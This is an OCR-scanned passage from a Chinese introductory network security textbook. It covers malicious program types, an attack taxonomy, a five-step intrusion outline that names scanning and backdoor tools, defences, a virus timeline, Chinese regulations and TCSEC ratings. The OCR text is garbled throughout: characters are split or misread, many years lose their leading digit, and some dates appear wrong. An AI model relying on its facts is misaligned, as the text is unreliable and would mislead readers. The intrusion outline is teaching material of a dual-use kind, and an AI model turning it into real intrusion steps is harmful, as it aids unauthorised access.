办 法 实现 起 来 并 不 容易 ,而 且 一 般 需 要 有 机 构 内 部 的 了 解 网 络 和 操作 过 程 的 人 参与 。 

5. 有 害 程序 造成 的 威胁 

有 害 程 序 造成 的 威胁 包括 三 个 方面 : 病毒 .代码 炸弹 和 特洛伊 木马 。 

(1) 病毒 

病毒 是 一 种 把 自己 的 复制 件 附着 于 机 器 中 的 另 一 程序 上 的 一 段 代 码 。 通 过 这 种 方式 病 
毒 可 以 进行 自我 复制 ,并 随 着 它 所 附着 的 程序 在 机 器 之 间 传 播 。 

(2) 代码 炸弹 

代码 炸弹 是 一 种 具有 杀伤 力 的 代码 ,其 原理 是 一 旦 到 达 设 定 的 日 期 或 时 刻 ,或 在 机 
器 中 发 生 了 某 种 操作 ,代码 炸弹 就 被 触发 并 开始 产生 破坏 性 操作 。 代 码 炸弹 不 必 像 病毒 
那样 四 处 传播 ,程序 员 将 代码 炸弹 写 入 软件 中 ,使 其 产生 了 一 个 不 能 被 轻易 找到 的 安全 
漏洞 ,一 旦 该 代码 炸弹 被 触发 ,这 个 程序 员 便 会 被 请 回来 修正 这 个 错误 ,并 赚 一 笔 钱 。 这 
种 高 技术 的 敲诈 的 受害 者 甚至 不 知道 他 们 被 敲诈 了 ,即便 他 们 有 疑心 也 无 法 证 实 自己 的 
猜测 。 

(3) 特洛伊 木马 

特洛伊 木马 程序 一 旦 被 安装 到 机 器 上 , 便 可 按 编制 者 的 意图 行事 ,让 攻击 者 获得 了 远程 
访问 和 控制 系统 的 权限 。 特 洛 伊 木马 能 够 摧毁 数据 ,有 时 伪装 成 系统 上 已 有 的 程序 ,有 时 创 
建新 的 用 户 名 和 口令 。 


1.2 研究 网 络 安全 的 两 大 体系 : 攻击 和 咏 御 


从 系统 安全 的 角度 可 以 把 网 络 安全 的 研究 内 容 分 为 两 大 体系 : 网 络 攻击 和 网 络 防御 ， 
如 图 1-1 所 示 。 
1.2.1 网 络 攻 击 分 类 

随 着 互联 网 的 迅猛 发 展 ,一 些 “ 信 息 垃 圾 “邮件 炸弹 ”“ 病 毒 木马 ”“ 网 络 黑 客 ” 等 越 来 
越 多 地 威胁 着 网 络 的 安全 ,而 网 络 攻击 是 最 重要 的 威胁 来 源 之 一 ,所 以 有 效 地 防范 网 络 攻击 
势 在 必 行 ,一 个 能 真正 能 有 效应 对 网 络 攻击 的 高 手 应 该 做 到 知己 知 彼 , 方 可 百 战 不 殖 。 网 络 
攻击 主要 包括 以 下 几 个 方面 。 

1. 按照 TCP/IP 协议 层次 进行 分 类 

这 种 分 类 是 基于 对 攻击 所 属 的 网 络 层次 进行 的 ,TCP/IP 协议 传统 意义 上 分 为 4 层 , 攻 
击 类 型 可 以 分 成 以 下 4 类 。 
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网 络 攻击 防御 体系 


网 络 攻击 技术 网 络 防御 技术 
基于 协议 的 攻击 技术 基于 协议 的 防御 技术 
操作 系统 漏洞 攻击 技术 操作 系统 安全 配置 技术 
ITS 漏洞 攻击 技术 HS 漏洞 防御 技术 
Web 应 用 漏洞 攻击 技术 Web 应 用 漏洞 防御 技术 


网 络 攻防 的 实施 
工具 软件 : 木马 /网 络 扫描 工具 /炸弹 工具 /木马 克星 /安全 防御 工具 等 
i 


网 络 安全 物理 基础 
操作 系统 UNIX/Linux/Windows 
网 络 协 议 ; TCP/IPIUDP/SMTP/POP/FTP/HTTP 


1-1 网 络 攻击 和 网 络 防御 


CD 针对 数据 链 路 层 的 攻击 (如 ARP 欺骗 ) 。 

(2) 针对 网 络 层 的 攻击 (如 Smurf 攻击 .ICMP 路 由 欺骗 ) 。 

(3) 针对 传输 层 的 攻击 (如 SYN 洪水 攻击 ,会话 支持 )。 

(4) 针对 应 用 层 的 攻击 (如 DNS 欺骗 和 窃取 ) 。 

2. 按照 攻击 者 目的 分 类 攻击 

(1) DoS( 拒 绝 服务 攻击 ) 和 DDoS( 分 布 式 拒绝 服务 攻击 )。 

(2) Sniffer 监听 。 

3. 按 危 害 范围 分 类 攻击 

CD 局 域 网 范围 (如 Sniffer 和 一 些 ARP 欺骗 ) 。 

(2) 广域网 范围 (如 大 规模 僵尸 网 络 造成 的 DDoS ) 。 

(3) 会 话 支持 与 网 络 欺骗 。 

(4) 获得 被 攻击 主机 的 控制 权 , 针 对 应 用 层 协 议 的 缓冲 区 溢出 基本 上 是 为 了 得 到 被 攻 
击 主机 的 shell。 


1.2.2 网 络 攻击 的 具体 步骤 


1. 网 络 监 听 

网 络 监听 指 自己 不 主动 去 攻击 别人 ,在 计算 机 上 设置 一 个 程序 去 监听 目标 计算 机 与 其 
他 计算 机 通信 的 数据 (Sniffer) 。 

2. 网 络 扫 描 

网 络 扫描 指 利用 程序 去 扫描 目标 计算 机 开放 的 端口 等 ,目的 是 发 现 漏洞 ,为 人 侵 该 计算 
机 做 准备 (GetNTUser 扫描 用 户 名 和 密码 、X-Scan 漏洞 、FindPass)。 

3. 网 络 入 侵 

网 络 人 侵 指 当 探测 发 现 对 方 存在 漏洞 以 后 ,入 侵 到 目标 计算 机 获取 信息 (Snake IIS, 
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RTCS), 

4. 网 络 后 门 

成 功 入 侵 目 标 计算 机 后 ,为 了 对 “战利品 ”的 长 期 控制 ,在 目标 计算 机 中 种 植木 马 等 后 门 
(Telnet, Win2kPass) 。 

5. 网 络 隐身 

入 侵 完毕 退出 目标 计算 机 后 ,将 自己 入 侵 的 痕迹 清除 ,从 而 防止 被 对 方 管 理 员 发 现 ( 清 
除 日 志 )。 


1.2.3 网络 防 御 技 术 


1. 操作 系统 的 安全 配置 

操作 系统 的 安全 是 整个 网 络 安全 的 关键 ,目前 服务 器 常用 的 操作 系统 有 三 类 : UNIX, 
Linux 和 Windows NT/2000/2003 Server。 这 些 操作 系统 都 是 符合 C2 级 安全 标准 的 操作 
系统 ,但 是 都 存在 不 少 漏洞 ,如 果 对 这 些 漏洞 不 了 解 ,不 采取 相应 的 安全 措施 ,就 会 使 操作 系 
统 被 完全 暴露 给 入 侵 者 。 

2. 加 密 技术 

数据 加 密 技 术 是 网 络 中 最 基本 的 安全 技术 ,主要 是 通过 对 网 络 中 传输 的 信息 进行 数据 
加 密 来 保障 其 安全 性 ,防止 被 监听 和 数据 被 盗 取 ,这 是 一 种 主动 安全 防御 策略 ,用 很 小 的 代 
价 即 可 为 信息 提供 相当 强 的 安全 保护 。 具 体 的 加 密 算法 有 DES.RSA 等 。 

3. 防火 墙 技术 

防火 墙 技术 是 利用 防火 墙 ,在 内 部 网 和 外 部 网 之 间 、 专 用 网 与 公共 网 之 间 对 传输 的 数据 
进行 限制 ,从 而 防止 被 人 侵 。 

4. 入 侵 检 测 

入 侵 检 测 作 为 一 种 积极 主动 的 安全 防护 技术 ,提供 了 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 
实时 保护 ,在 网 络 系统 受到 危害 之 前 拦截 和 响应 人 侵 ,因此 被 认为 是 防火 墙 之 后 的 第 二 道 安 
全 闸门 。 在 不 影响 网 络 性 能 的 情况 下 能 对 网 络 进行 监测 ,如 果 网 络 防线 最 终 被 攻破 了 ,需要 
及 时 发 出 被 人 侵 的 警报 。 


1.3 网 络 安全 的 现状 


1.3.1 我 国 网 络 安全 现状 


2009 年 3 月 25 日 ,中 国 互联 网 络 信息 中 心 (CNNIC) 发 布 T《2008 年 中 国 网 民 信息 网 
络 安 全 状况 研究 报告 》。 据 调查 显示 ,截至 2008 年 底 , 我 国 互 联网 普及 率 为 22. 6% ,超过 
21.9% 的 全 球 平均 水 平 。 网 民 人 数 近 3 亿 , 总 带宽 625Gbps,IP 地 址 1. 8 亿 个 ,手机 上 网 用 
户 1.17 亿 。 不 可 避免 的 ,网 络 安全 问题 也 更 加 严峻 。 这 几 年 随 着 信息 化 基础 建设 的 推进 ， 
网 络 安全 管理 已 经 成 为 关系 国家 安全 ,社会 稳定 的 重要 因素 ,特别 是 随 着 4G 时 代 的 到 来 ， 
网 络 安全 管理 的 重要 性 将 更 加 突出 。 报 告 显示 ,超过 七 成 的 网 民 愿 意 使 用 免费 的 安全 软件 ， 
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而 近 八 成 的 网 民 对 于 在 网 上 提供 个 人 信息 有 着 不 同 程度 的 担忧 ,网 络 信息 安全 已 经 成 为 影 
响 网 民 上 网 行为 的 重要 因素 。 同 时 ,调查 显示 ,96.1% 的 网 民 个 人 计算 机 中 装 有 信息 安全 软 
件 , 其 中 70.5% 的 网 民选 择 使 用 单一 品牌 的 安全 套装 软件 产品 。28% 的 网 民 使 用 过 在 线 查 
毒 服务 ,其 中 近 1/3 的 用 户 还 使 用 了 在 线 杀 毒 服 务 。 上 述 数 据 充分 说 明了 我 国 网 民 对 网 络 
信息 安全 的 高 度 重视 。 值 得 注意 的 是 ,按照 2008 年 底 国内 现 有 网 民 数量 统计 ,尚未 安装 安 
全 软件 的 网 民 数量 超过 1000 万 ,这 一 数据 反映 出 大 量 上 网 人 群 的 信息 安全 存在 隐患 。 调 研 
结果 表明 ,74% 的 网 民 表示 愿意 使 用 免费 杀毒 软件 ,这 说 明 免 费 杀 毒 软件 对 于 绝 大 多 数 网 民 
具有 较 大 的 吸引 力 。 

报告 数据 显示 ,当前 国内 有 近 一 亿 网 民 使 用 过 网 上 银行 专业 版 , 占 我 国 网 民 总 数 的 
33. 4%。 随 着 我 国 互联 网 的 发 展 ,网 民 对 互联 网 的 应 用 已 经 从 单纯 的 娱乐 转向 购物 求职 等 
多 个 方面 ,对 网 络 信 息 安全 的 需求 也 日 益 提高 。 

我 国 网 络 信息 安全 研究 历经 了 通信 保密 、 数 据 保护 两 个 阶段 ,正在 进入 网 络 信息 安全 研 
究 阶段 , 现 已 开发 研制 出 防火 墙 .安全 路 由 器 、 安 全 网 关 、 黑 客人 侵 检 测 、 系 统 脆弱 性 扫描 软 
件 等 。 网 络 信息 安全 领域 是 一 个 综合 .交叉 的 学 科 领 域 , 它 综合 了 利用 数学 .物理 .生化 信息 
技术 和 计算 机 技术 等 诸多 学 科 的 长 期 积累 和 最 新 发 展 成 果 ,提出 系统 的 、 完 整 的 和 协同 的 解 
决 网 络 信息 安全 的 方案 。 

解决 网 络 信息 安全 问题 的 主要 途径 是 利用 密码 技术 和 网 络 访问 控制 技术 。 密 码 技术 用 
于 隐蔽 传输 信息 、 认 证 用 户 身 份 等 。 网 络 访问 控制 技术 用 于 对 系统 进行 安全 保护 ,抵抗 各 种 
外 来 攻击 。 目 前 ,国际 上 已 有 众多 的 网 络 安全 解决 方案 和 产品 ,但 由 于 出 口 政策 和 自主 性 等 
问题 ,不 能 直接 用 于 解决 我 国 的 网 络 安全 问题 。 现 在 ,国内 已 有 一 些 网 络 安全 解决 方案 和 产 
品 , 如 360 系列 的 网 络 安全 产品 。 


1.3.2 国外 网 络 安全 现状 


目前 在 信息 安全 技术 处 于 领先 地 位 的 国家 主要 是 美国 、 法 国 、 以 色 列 、 英 国 、 丹 麦 、 瑞 士 
等 。 一 方面 这 些 国家 在 技术 上 特别 是 在 芯片 技术 上 有 着 一 定 的 历史 沉积 , 另 一 方面 这 些 国 
家 在 信息 安全 技术 的 应 用 上 (例如 电子 政务 .企业 信息 化 等 ) 起 步 较 早 ,应 用 比较 广泛 。 他 们 
的 领先 优势 主要 集中 在 防火 墙 \, 人 侵 监 测 、 漏 洞 扫描 、 防 杀毒 .身份 认证 等 传统 的 安全 产品 
上 ,而 在 注重 防 内 兼顾 防 外 的 信息 安全 综合 强 审计 上 ,国内 的 意识 理念 早 于 国外 ,产品 开发 
早 于 国外 ,目前 在 技术 上 有 一 定 的 领先 优势 。 

“9。11? 以 后 国际 网 络 安全 学 术 研 究 受 到 国际 大 气候 的 影响 ,围绕 “反恐 "的 主题 展开 了 
太 多 的 工作 ,但 工作 的 重心 是 防止 外 部 黑客 攻击 。 实 际 上 ,“ 恺 怖 分 子 ”" 大 多 是 在 取得 合法 的 
身份 以 后 再 实施 恶性 攻击 和 破坏 的 。 审 计 监 控 体 系 正 是 以 假设 取得 权限 进入 网 络 的 人 的 操 
作 行 为 都 是 不 可 信任 的 为 前 提 , 对 所 有 内 部 人 的 操作 行为 进行 记录 挖掘 、 分 析 从 而 获得 有 
价值 信息 的 一 套 安 全 管理 体系 。 

2013 年 6 月 5 日 ,美国 前 中 情 局 (CIA) 职 员 爱 德 华 。 斯 诺 登 披露 给 媒体 两 份 绝密 资料 ， 
一 份 资料 称 : 美国 国家 安全 局 有 一 项 代号 为 “楼 镜 ” 的 秘密 项 目 一 一 “楼 镜 ” 窃 听 计 划 。 该 计 
划 始 于 2007 年 的 小 布什 时 期 ,美国 情报 机 构 一 直 在 9 家 美国 互联 网 公司 中 进行 数据 挖 气 工 
作 , 从 音频 视频. 图片. 邮件、 文档 以 及 连接 信息 中 分 析 个 人 的 联系 方式 与 行动 。 监 控 的 类 
型 有 10 类 : 包括 信息 电邮 、 即 时 消息 、 视 频 、 照 片 、 存 储 数据 、 语 音 聊 天 、 文 件 传输 、 视 频 会 
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议 、 登 录 时 间 和 社交 网 络 资料 的 细节 。 其 中 包括 两 个 秘密 监视 项 目 : 一 是 监视 ,监听 民众 电 
话 的 通话 记录 ,要 求 电信 巨头 威 瑞 森 公司 必须 每 天 上 交 数 百 万 用 户 的 通话 记录 ; 另 一 份 资 
料 更 加 惊人 ,美国 国家 安全 局 和 联邦 调查 局 通过 进入 微软 、 谷 歌 、 苹 果 等 九 大 网 络 巨 头 的 服 
务 器 ,监控 美国 公民 的 电子 邮件 、 聊 天 记录 等 秘密 资料 。 他 表示 ,美国 政府 早 在 数 年 前 就 入 
侵 中 国 一 些 个 人 和 机 构 的 计算 机 网 络 , 其 中 包括 政府 官员 、 商 界 人 士 甚 至 学 校 。 斯 诺 登 后 来 
被 迫 前 往 俄罗斯 避难 。 


1.3.3 网络 安全 事件 


20 世纪 60 年 代 美国 贝尔 实验 室 编写 *“ 磁 芯 大 战 ”。 
20 世纪 70 年 代 美国 雷 恩 的 《PI 的 青春 ) 构 思 病 毒 。 
982 年 Elk Cloner 病毒 风靡 当时 的 苹果 下 型 计算 机 。 
983 年 11 月 国际 计算 机 安全 学 术 研 讨 会 对 计算 机 病毒 进行 了 实验 。 
20 世纪 80 年 代 后 期 “巴基斯坦 智 事 ? 病 毒 诞生 。 
986 年 大脑” 病毒 出 现 ,这 是 通过 A 区 引导 感染 的 病毒 。 
988 年 莫 里 斯 蠕虫 病毒 爆发 ,标志 网 络 病毒 的 开始 。 
1990 年 复合 型 病毒 ,可 感染 com 和 exe 文件 。 
992 ^E DOS 病毒 利用 加 载 文件 优先 进行 工作 同时 生成 com, exe 类 文件 ,代表 病毒 
“ 金 蝉 ”。 
993 年 利用 汇编 编写 的 幽灵 类 病毒 盛行 。 
996 年 国内 出 现 G2,IVP,VCL 病毒 的 病毒 生产 软件 ,同时 欧美 出 现 * 变 形 金刚 ?病毒 
生产 机 。 
1997 年 微软 的 Word 宏 病 毒 开 始 流行 。 
1998 年 陈 英豪 编写 的 破坏 计算 机 硬盘 数据 ,同时 可 能 破坏 BIOS 程序 恶性 病毒 。 
1999 年 美国 受到 历史 上 第 二 次 重创 一 一 "美丽 杀手 "病毒 进行 了 一 次 大 的 爆发 。 
2000 年 用 VBS 编写 的 “ 爱 虫 "病毒 流行 。 
2001 年 “ 尼 姆 达 " 病 毒 肆虐 全 球 数 百 万 电脑 。 
2002 年 Melissa 作为 邮件 附件 的 宏 病毒 流行 。 
2003 年 “蓝宝石 (SQL Slammer)、“ 冲 击 波 ”" 和 “蠕虫 王 ” 等 蠕虫 病毒 流行 。 
2004 年 Bagle 蠕虫 病毒 , “震荡 波 ” 流 行 。 
2005 年 ,从 2005 年 上 半年 开始 广泛 出 现 rootkits 类 病毒 ,出 现 了 集成 多 种 病毒 特征 于 
一 体 的 超级 病毒 。 
2006 年 开始 大 规模 流行 “ 威 金 " 病 毒 “ 落 雪 ” 病 毒 ,并 且 开 始 频繁 地 有 “oday” 类 利用 系 
2007 年 的 “熊猫 烧香 ”Autorun、ARP ,视频 类 病毒 增长 迅猛 。 
2008 年 “机 器 狗 ”“ 磁 碟 机 ”, 通 过 2006 年 兴起 的 免 杀 技术 的 流行 , 反 查 杀 、 反 杀毒 软 
件 \ 反 主动 防御 类 新 型 病毒 出 现 。 还 有 “扫荡 波 " 病 毒 等 。 病 毒 的 主要 特点 是 爆发 性 强 ,感染 
和 传播 广泛 ,而 且 很 难 防范 。 
2009 年 初 ,微软 IE. PDF. MS08067.0day 等 一 些 高 危 漏洞 流行 ,出 现 木 马 群 .蝗虫 军 
团 Conficker 等 。 
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1.4 网络 立法 和 评价 标准 
1.4.1 我 国立 法 情况 


目前 网 络 安全 方面 的 法 规 已 经 写 人 《中 华人 民 共 和 国 宪法 》。 
982 年 8 月 23 日 写 人 《中 华人 民 共 和 国 商标 法 》。 
984 4E 3 H 12 日 写 人 《中 华人 民 共和 国 专利 法 》。 
988 年 9 月 5 日 写 和 人 《中 华人 民 共 和 国保 守 国 家 秘密 法 》。 
993 年 9 月 2 日 写 人 《中 华人 民 共 和 国 反 不 正当 竞争 法 》。 
991 年 9 月 1 日 (计算 机 软件 保护 条 例 》。 
994 年 2 月 18 日 (计算 机 信息 系统 安全 保护 条 例 》。 
997 年 5 月 20 日 ,国务 院 颁布 7 了 《国务院 关 于 修改 (中 华人 民 共 和 国 计 算 机 信息 网 络 
国际 联网 管理 暂行 规定 ?的 决定 》, 对 《中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂行 规 
定 ) 进 行 修正 。 
997 4E 11 月 ,中 国 互联 网 络 信息 中 心 (CNNIC) 发 布 了 第 一 次 (中国 互联 网 络 发 展 状况 
统计 报告 ): 截止 到 1997 年 10 月 31 日 ,中 国共 有 上 网 计算 机 29.9 万 台 , 上 网 用 户 数 62 万 ， 
CN 下 注册 的 域名 4066 个 ,WWW 站 点 约 1500 个 ,国际 出 口 带宽 25. 408Mbps。 
997 年 12 月 30 日 ,公安 部 发 布 了 由 国务 院 批准 的 《计算 机 信息 网 络 国际 联网 安全 保 
护 管理 办 法 》。 
998 年 3 月 6 日 ,国务 院 信息 化 工作 领导 小 组 办 公 室 发 布 (中 华人 民 共 和 国 计 算 机 信 
息 网 络 国际 联网 管理 暂行 规定 实施 办 法 》, 并 自 颁布 之 日 起 施行 。 

2000 年 4 月 26 日 颁布 并 实施 公安 部 第 51 号 令 ( 计 算 机 病毒 防治 管理 办 法 》。 

其 中 《计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 》 中 有 关 条 款 规定 如 下 : 

第 五 条 任何 单位 和 个 人 不 得 利用 国际 联网 制作 、 复 制 ,查阅 和 传播 下 列 信息 : 

(一 ) 煽动 抗拒 ,破坏 宪 法 和 法 律 \ 行 政法 规 实施 的 ; 

(二 ) 煽动 颠覆 国家 政权 ,推翻 社会 主义 制度 的 ; 

(三 ) 煽动 分 裂 国家 、 破 坏 国 家 统一 的 ; 

(四 ) 煽动 民族 仇恨 、 民 族 歧视 ,破坏 民族 团结 的 ; 

(五 ) 捏造 或 者 牌 曲 事实 ,散布 谣言 ,扰乱 社会 秩序 的 ; 

(六 ) 宣扬 封建 迷信 淫秽、 色情 .赌博 暴力 ` 凶 杀 、 恺 怖 ,教唆 犯罪 的 ; 

(七 ) 公然 侮辱 他 人 或 者 捏造 事实 诽谤 他 人 的 ; 

CAO. 损害 国家 机 关 信 誉 的 ; 

( 九 ) 其 他 违反 宪法 和 法 律 .行政 法 规 的 。 

第 六 条 任何 单位 和 个 人 不 得 从 事 下 列 危 害 计 算 机 信息 网 络 安全 的 活动 ， 

(一 ) 未 经 允许 ,进入 计算 机 信息 网 络 或 者 使 用 计算 机 信息 网 络 资源 的 ; 

(二 ) 未 经 允许 ,对 计算 机 信息 网 络 功 能 进行 删除 、 修 改 或 者 增加 的 ; 

(三 ) 未 经 允许 ,对 计算 机 信息 网 络 中 存储 、 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删除 、 
修改 或 者 增加 的 ; 
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(qu) 故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 的 ; 

(五 ) 其 他 危害 计算 机 网 络 安全 的 。 

第 十 条 ”互联 单位 、 接 入 单位 及 使 用 计算 机 信息 网 络 国际 联网 的 法 人 和 其 他 组 织 应 当 
履行 下 列 安全 保护 职责 : 

(一 ) 负责 本 网 络 的 安全 保护 管理 工作 ,建立 健全 安全 保护 管理 制度 ; 

(二 ) 落实 安全 保护 技术 措施 ,保障 本 网 络 的 运行 安全 和 信息 安全 ; 

(三 ) 负责 对 本 网 络 用 户 的 安全 教育 和 培训 ; 

(四 ) 对 委托 发 布 信息 的 单位 和 个 人 进行 登记 ,并 对 所 提供 的 信息 内 容 按 照 本 办 法 第 五 
条 进行 审核 ; 

(五 ) 建立 计算 机 信息 网 络 电子 公告 系统 的 用 户 登 记 和 信息 管理 制度 ; 

(六 ) 发 现 有 本 办 法 第 四 条 、 第 五 条 、 第 六 条 、 第 七 条 所 列 情形 之 一 的 ,应 当 保 留 有 关 原 
始 记录 ,并 在 二 十 四 小 时 内 向 当地 公安 机 关 报 告 ; 

(七 ) 按照 国家 有 关 规 定 , 删 除 本 网 络 中 含有 本 办 法 第 五 条 内 容 的 地 址 .目录 或 者 关闭 
服务 器 。 


1.4.2 我 国 评价 标准 


在 我 国 根据 1999 年 10 月 经 过 国家 质量 技术 监督 局 批准 发 布 的 (计算 机 信息 系统 安全 
保护 等 级 划分 准则 》, 将 计算 机 安全 保护 划分 为 以 下 5 个 级 别 ,一 到 五 级 越 来 越 高 。 

第 一 级 为 用 户 自主 保护 级 : 它 的 安全 保护 机 制 使 用 户 具备 自主 安全 保护 的 能 力 , 保 护 
用 户 的 信息 免 受 非法 的 读 写 破坏 。 

第 二 级 为 系统 审计 保护 级 : 除 具 备 第 一 级 所 有 的 安全 保护 功能 外 ,要 求 创建 和 维护 访 
问 的 审计 跟踪 记录 ,使 所 有 的 用 户 对 自己 的 行为 的 合法 性 负责 。 

第 三 级 为 安全 标记 保护 级 : 除 继承 前 一 个 级 别 的 安全 功能 外 ,还 要 求 以 访问 对 象 标记 
的 安全 级 别 限 制 访问 者 的 访问 权限 ,实现 对 访问 对 象 的 强制 保护 。 

第 四 级 为 结构 化 保护 级 : 在 继承 前 面 安全 级 别 安全 功能 的 基础 上 ,将 安全 保护 机 制 划 
分 为 关键 部 分 和 非 关 键 部 分 ,对 关键 部 分 直接 控制 访问 者 对 访问 对 象 的 存 取 ,从 而 加 强 系统 
的 抗 渗透 能 力 。 

第 五 级 为 访问 验证 保护 级 : 这 一 个 级 别 特别 增设 了 访问 验证 功能 ,负责 仲裁 访问 者 对 
访问 对 象 的 所 有 访问 活动 。 


1.4.3 国际 评价 标准 


根据 美国 国防 部 开发 的 计算 机 安全 标准 一 一 可 信 计 算 机 系统 评价 标准 (Trusted 
Computer System Evaluation Criteria, TCSEC) ,也 就 是 网 络 安全 橙 皮 书 , 一 些 计 算 机 安全 
级 别 被 用 来 评价 一 个 计算 机 系统 的 安全 性 。 自 从 1985 年 橙 皮 书 成 为 美国 国防 部 的 标准 以 
来 ,就 一 直 没 有 改变 过 ,多 年 以 来 一 直 是 评估 多 用 户主 机 和 小 型 操作 系统 的 主要 方法 。 其 他 
子 系统 (如 数据 库 和 网 络 ) 也 一 直 用 橙 皮 书 来 解释 评估 。 橙 皮 书 把 安全 的 级 别 从 低 到 高 分 成 
4 个 类 别 : D 类 、C 类 、B 类 和 A 类 .每 类 又 分 几 个 级 别 ,如 表 1-1 所 示 。 
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表 1-1 国际 评价 标准 


类 别 | 级 3 名 R 主要 特征 

D D 低级 保护 没有 安全 保护 

ë Ci 自主 安全 保护 自主 存储 控制 
C2 受 控 存储 控制 单独 的 可 查 性 ,安全 标识 
Bl 标识 的 安全 保护 强制 存 取 控 制 ,安全 标识 

B B2 结构 化 保护 面向 安全 的 体系 结构 , 较 好 的 抗 渗透 能 力 
B3 安全 区 域 存 取 监 控 ,高 抗 渗 透 能 力 

A A 验证 设计 形式 化 的 最 高 级 描述 和 验证 


D 级 是 最 低 的 安全 级 别 ,拥有 这 个 级 别 的 操作 系统 就 像 一 个 门户 大 开 的 房子 ,任何 人 都 
可 以 自由 进出 ,是 完全 不 可 信任 的 。 对 于 硬件 来 说 ,是 没有 任何 保护 措施 的 ,操作 系统 容易 
受到 损害 ,没有 系统 访问 限制 和 数据 访问 限制 ,任何 人 不 需 任 何 账户 都 可 以 进入 系统 ,不 受 
任何 限制 地 访问 他 人 的 数据 文件 。 属 于 这 个 级 别 的 操作 系统 有 : DOS 和 Windows 98 等 。 

C1 是 C 类 的 一 个 安全 子 级 。C1 又 称 选 择 性 安全 保护 (Discretionary Security Protection) 
系统 , 它 描述 了 一 个 典型 的 用 在 UNIX 系统 上 的 安全 级 别 , 这 种 级 别 的 系统 对 硬件 又 有 某 种 
程度 的 保护 ,如 用 户 拥有 注册 账号 和 口令 ,系统 通过 账号 和 口令 来 识别 用 户 是 否 合 法 ,并 决 
定 用 户 对 程序 和 信息 拥有 什么 样 的 访问 权 , 但 硬件 受到 损害 的 可 能 性 仍然 存在 。 用 户 拥 有 
的 访问 权 是 指 对 文件 和 目标 的 访问 权 , 文 件 的 拥有 者 和 超级 用 户 可 以 改变 文件 的 访问 属性 ， 
从 而 对 不 同 的 用 户 授予 不 同 的 访问 权限 。 

C2 级 除了 包含 Cl 级 的 特征 外 ,应 该 具有 访问 控制 环境 (Controlled Access Environment) 
权力 。 该 环境 具有 进一步 限制 用 户 执行 某 些 命令 或 者 访问 某 些 文件 的 权限 ,而 且 还 加 入 了 
身份 认证 等 级 。 另 外 ,系统 对 发 生 的 事情 加 以 审计 并 写 入 日 志 中 ,如 什么 时 候 开 机 、 哪 个 用 
户 在 什么 时 候 从 什么 地 方 登录 等 。 这 样 通过 查看 日 志 , 就 可 以 发 现 人 侵 的 痕迹 ,如 多 次 登录 
失败 ,可 以 大 致 推测 出 可 能 有 人 想 人 侵 系 统 。 审 计 除 了 可 以 记录 下 系统 管理 员 执 行 的 活动 
以 外 ,还 加 入 了 身份 认证 级 别 ,这 样 就 可 以 知道 谁 在 执行 这 些 命令 。 审 计 的 缺点 在 于 它 需 要 
额外 的 处 理 时 间 和 磁盘 空间 。 使 用 附加 身份 验证 就 可 以 让 一 个 C2 级 系统 用 户 在 不 是 超级 
用 户 的 情况 下 有 权 执行 系统 管理 任务 。 授 权 分 级 使 系统 管理 员 能 够 给 用 户 分 组 ,授予 他 们 
访问 某 些 程序 或 特定 的 目录 的 权限 。 能 够 达到 C2 级 别 的 常见 操作 系统 有 : 

(D UNIX 系统 ; 

(2) Novell 3. X 或 者 更 高 版 本 ; 

(3) Windows NT、Windows 2000 和 Windows 2003 。 

B 级 中 有 三 个 级 别 : Bl 级 即 标志 安全 保护 (Labeled Security Protection) ,是 支持 多 级 
安全 (例如 秘密 和 绝密 ) 的 第 一 个 级 别 , 这 个 级 别 说 明 处 于 强制 性 访问 控制 之 下 的 对 象 ,系统 
不 允许 文件 的 拥有 者 改变 其 许可 权限 。 安 全 级 别 存在 保密 、 绝 密级 别 , 这 种 安全 级 别 的 计算 
机 系统 一 般 在 政府 机 构 中 ,比如 国防 部 和 国家 安全 局 的 计算 机 系统 。 

B2 级 ,又 叫 结构 保护 级 别 (CStructured Protection) , 它 要 求 计 算 机 系统 中 所 有 的 对 象 都 
要 加 上 标签 ,而 且 给 设备 (磁盘 、 磁 带 和 终端 ) 分 配 单个 或 者 多 个 安全 级 别 。 

B3 级 ,又 叫做 安全 域 级 别 (Security Domain) ,使 用 安装 硬件 的 方式 来 加 强 域 的 安全 , 例 
如 ,内 存 管理 硬件 用 于 保护 安全 域 免 遭 无 授权 访问 或 更 改 其 他 安全 域 的 对 象 。 该 级 别 也 要 
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求 用 户 通过 一 条 可 信任 途径 连接 到 系统 上 。 

A 级 ,又 称 验 证 设计 级 别 (Verified Design), 是 当前 橙 皮 书 的 最 高 级 别 , 它 包含 了 一 个 
严格 的 设计 、 控 制 和 验证 过 程 。 该 级 别 包 含 了 较 低 级 别 的 所 有 的 安全 特性 设计 ,必须 从 数学 
角度 上 进行 验证 ,而 且 必 须 进行 秘密 通道 和 可 信任 分 布 分 析 。 可 信任 分 布 (Trusted 
Distribution) 的 含义 是 : 硬件 和 软件 在 物理 传输 过 程 中 已 经 受到 保护 ,以 防止 破坏 安全 
系统 。 

Wi REB tee E. TCSEC 是 针对 孤立 计算 机 系统 ,特别 是 小 型 机 和 主机 系统 。 假 设 
有 一 定 的 物理 保障 ,该 标准 适合 政府 和 军队 ,但 不 适合 企业 ,因为 这 个 模型 是 静态 的 。 


习 题 1 


一 、 填空 题 

网 络 安全 的 目标 CIA 指 的 是 

网 络 安全 的 保密 性 包括 

保障 网 络 信息 完整 性 的 方法 有 

网 络 安全 威胁 包括 

物理 威胁 包括 

身份 鉴别 造成 的 威胁 包括 

网 络 安全 的 研究 内 容 分 为 两 大 体系 : s 
SYN 是 对 层 的 攻击 ,Smurf 攻击 是 层 的 攻击 。 
网 络 攻击 五 步 是 

10. 网 络 防御 技术 包括 

二 、 简 答题 

1. 分 别 举 两 个 例子 说 明 网 络 安全 与 政治 .经济 .社会 稳定 和 军事 的 联系 。 
2. 我 国 关于 网 络 安全 的 立法 有 哪些 ? 

3. 我 国 关于 网 络 安全 的 评价 标准 内 容 是 什么 ? 

4. 国际 关于 网 络 安全 的 评价 标准 内 容 是 什么 ? 


o o0) -3 O0 Oc» s CQ t — 


第 2 鞋 


网 络 安全 协议 基础 


W 掌握 IP 协议 .TCP 协议 .UDP 协议 和 ICMP 协议 。 
图 掌握 文件 传输 服务 .Telnet 服务 、 电 子 邮 件 服务 和 Web 服务 。 
Wi 掌握 常用 的 网 络 服务 端口 和 常用 的 网 络 命令 的 使 用 。 


